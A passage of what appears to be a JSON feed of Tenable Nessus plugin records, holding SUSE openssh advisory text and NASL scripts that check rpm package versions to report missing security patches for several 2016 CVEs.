script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-54.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0607-2.NASL", "href": "https://www.tenable.com/plugins/nessus/97652", "published": "2017-03-10T00:00:00", "title": "SUSE SLED12 Security Update : openssh (SUSE-SU-2017:0607-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0607-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97652);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLED12 Security Update : openssh (SUSE-SU-2017:0607-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170607-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d4a5c31\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-325=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-325=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-325=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debugsource-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-6.6p1-54.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369) Non security issues fixed :\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0606-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97570", "published": "2017-03-07T00:00:00", "title": "SUSE SLES11 Security Update : openssh (SUSE-SU-2017:0606-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0606-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97570);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLES11 Security Update : openssh (SUSE-SU-2017:0606-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369) Non security issues fixed :\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170606-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?67b25b28\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-openssh-13005=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-openssh-13005=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-openssh-13005=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-openssh-13005=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-openssh-13005=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-openssh-13005=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"openssh-6.2p2-0.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"openssh-askpass-6.2p2-0.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"openssh-askpass-gnome-6.2p2-0.40.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0607-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97571", "published": "2017-03-07T00:00:00", "title": "SUSE SLES12 Security Update : openssh (SUSE-SU-2017:0607-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0607-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97571);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssh (SUSE-SU-2017:0607-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170607-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?235ae17c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-325=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-54.7.1\")) flag++;\nif 